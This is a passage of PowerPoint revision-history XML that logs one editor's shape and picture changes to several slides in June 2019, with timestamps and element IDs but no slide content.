          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:19:51.540" v="1195" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="2" creationId="{87BB03A3-9C31-4CFE-B7EC-501A92F713CE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:18:47.133" v="1182" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="3" creationId="{38858550-EB68-4712-9AA3-FF450953D228}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T05:37:00.036" v="937" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="4" creationId="{2DDEECF7-AF9E-4EF3-91A3-689445B25498}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T05:33:44.550" v="852" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="5" creationId="{1420FA96-4198-44C4-8BFB-9BDB38B63AFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T05:35:01.223" v="901" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="6" creationId="{A4FF51CD-00ED-4538-90A0-2887499F6587}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:18:34.680" v="1179" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="7" creationId="{64BB1751-D3DC-4471-B6B0-BE6ADE79F9AF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:31:34.511" v="1208" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="10" creationId="{CB3684D4-D794-4E2B-B497-88A551AA932A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:19:01.040" v="1184" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:picMk id="8" creationId="{B6A08647-F291-4D90-9175-F8A88C7A4398}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:29:55.420" v="1" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2886590775" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:29:51.529" v="0" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="10" creationId="{966440A0-F4F2-4001-9BE7-5D9C213C4A63}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:29:55.420" v="1" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2886590775" sldId="258"/>
            <ac:spMk id="18" creationId="{DA260270-63F7-4E17-8ECA-5CCA0C71D60E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:34:48.718" v="49" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2809929173" sldId="259"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:34:44.249" v="48" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="8" creationId="{594532C4-922D-484C-8561-C44201948888}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:34:48.718" v="49" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2809929173" sldId="259"/>
            <ac:picMk id="10" creationId="{D86248CE-9B72-4003-B5B5-8EC68C4FB040}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:03:17.021" v="1079" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3389707094" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:17:28.047" v="517" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="2" creationId="{496DE6F0-0365-4996-86ED-FFF7DE98959E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:02:43.880" v="1076" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="3" creationId="{CEA5E269-53FF-4139-94B1-F3A6BFFA2EA8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:51:38.991" v="812" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="4" creationId="{C1072647-6C18-4C9E-8B4B-F8295ED393E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:32:15.358" v="29" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="11" creationId="{4433FC25-B531-47BF-9B5B-3260DC990C9B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:52:00.772" v="823" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="12" creationId="{D0165FD3-F8E2-4C88-B2C0-2825257D3E95}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:03:17.021" v="1079" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="13" creationId="{9421A58A-247E-45C9-A2FB-C100B321D85B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-05T23:33:20.233" v="44" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3389707094" sldId="260"/>
            <ac:spMk id="14" creationId="{225D98CD-0F4A-47A2-B4A5-5F0AFEAF6928}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:05:38.068" v="1084" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3166696917" sldId="263"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:13:30.217" v="402" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="4" creationId="{815B2CBF-BD4F-4595-A98C-B1095711A733}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:05:38.068" v="1084" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="7" creationId="{08EE7223-1559-4620-9DED-F93E126C447A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:13:16.967" v="400" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="9" creationId="{C3928157-243E-437F-A637-49B080B226CC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:12:16.045" v="388" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="10" creationId="{AE22FB64-BD46-4197-9857-30F7BB9E1B68}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:10:04.966" v="304" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3166696917" sldId="263"/>
            <ac:spMk id="11" creationId="{187E7847-61A2-472D-8F2B-CF61380CE533}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:08:06.412" v="1100" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4024087431" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:08:06.412" v="1100" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4024087431" sldId="266"/>
            <ac:spMk id="4" creationId="{D3E13A53-D891-4A54-8903-F8E8B2FE28AB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:40:43.722" v="797" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="917986403" sldId="268"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:20:45.754" v="574" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="3" creationId="{38BEF986-BDF7-41B0-BE4B-668B68C76935}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:24:56.520" v="588" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="4" creationId="{F386FC69-FE23-4F32-9E24-20AC6DC189B6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:20:09.206" v="566" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="5" creationId="{FBC27690-1172-4F15-A4C9-FA4374D280B7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:35:09.540" v="628" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="6" creationId="{536869B4-7EF5-4245-9D67-4AD479F55AEF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:37:00.752" v="656" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="7" creationId="{9D6B73D1-4BA6-4AC5-B6CF-06E1CA6853E9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:39:04.862" v="695" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="8" creationId="{63A585BE-D2D1-4313-9498-E209410833F7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:40:43.691" v="796" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="9" creationId="{CCC1C1D5-F0B6-4A74-B079-4669B5EF5E2C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:40:43.722" v="797" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="917986403" sldId="268"/>
            <ac:spMk id="10" creationId="{C322A215-D478-4F6C-B5B9-00228AF17F4C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:06:29.615" v="1089" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1838342288" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:59:50.525" v="835" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="5" creationId="{DD1D58D5-0218-4BED-90D6-4F6819111FE2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:06:29.615" v="1089" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1838342288" sldId="269"/>
            <ac:spMk id="6" creationId="{D9015465-6EB7-4351-B478-AB5BC688F149}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:16:28.343" v="456" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2696278330" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:14:44.671" v="420" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2696278330" sldId="270"/>
            <ac:spMk id="3" creationId="{6214B742-0B1B-4FE9-8019-DAA8D472295F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T00:16:28.343" v="456" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2696278330" sldId="270"/>
            <ac:spMk id="4" creationId="{0F466325-8DB1-47C8-A7D4-280079B59ABB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:20:48.712" v="1198" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1408271386" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:20:48.712" v="1198" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="2" creationId="{7981C555-D780-48C2-BF22-749C37BE657E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{066680EF-5DBB-7C4D-2D22-6A841F6D7E8D}" dt="2019-06-06T06:00:03.395" v="1024" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1408271386" sldId="271"/>
            <ac:spMk id="5" creationId="{F3F015C1-4E03-433D-BF3E-B033B779896E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1A2F608C-34EF-E30C-6BAB-97E19A43A5A7}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1A2F608C-34EF-E30C-6BAB-97E19A43A5A7}" dt="2019-06-07T07:42:29.425" v="10" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1A2F608C-34EF-E30C-6BAB-97E19A43A5A7}" dt="2019-06-07T07:42:29.425" v="9" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1926449966" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1A2F608C-34EF-E30C-6BAB-97E19A43A5A7}" dt="2019-06-07T07:42:29.425" v="9" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="5" creationId="{1420FA96-4198-44C4-8BFB-9BDB38B63AFC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1A2F608C-34EF-E30C-6BAB-97E19A43A5A7}" dt="2019-06-07T07:41:44.003" v="5" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="6" creationId="{A4FF51CD-00ED-4538-90A0-2887499F6587}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{1A2F608C-34EF-E30C-6BAB-97E19A43A5A7}" dt="2019-06-07T07:41:20.003" v="0" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1926449966" sldId="257"/>
            <ac:spMk id="7" creationId="{64BB1751-D3DC-4471-B6B0-BE6ADE79F9AF}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{76317A58-62E7-4136-E2CA-2EE2F09DE271}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{76317A58-62E7-4136-E2CA-2EE2F09DE271}" dt="2019-06-05T23:13:34.295" v="90" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Oleksandr Horbunov" userId="S::ohorbunov@intellias.com::776c4207-a4fb-489e-ad0f-c14107108fdb" providerId="AD" clId="Web-{76317A58-62E7-4136-E2CA-2EE2F09DE271}" dt="2019-06-05T23:13:34.295" v="90" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="109857222" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
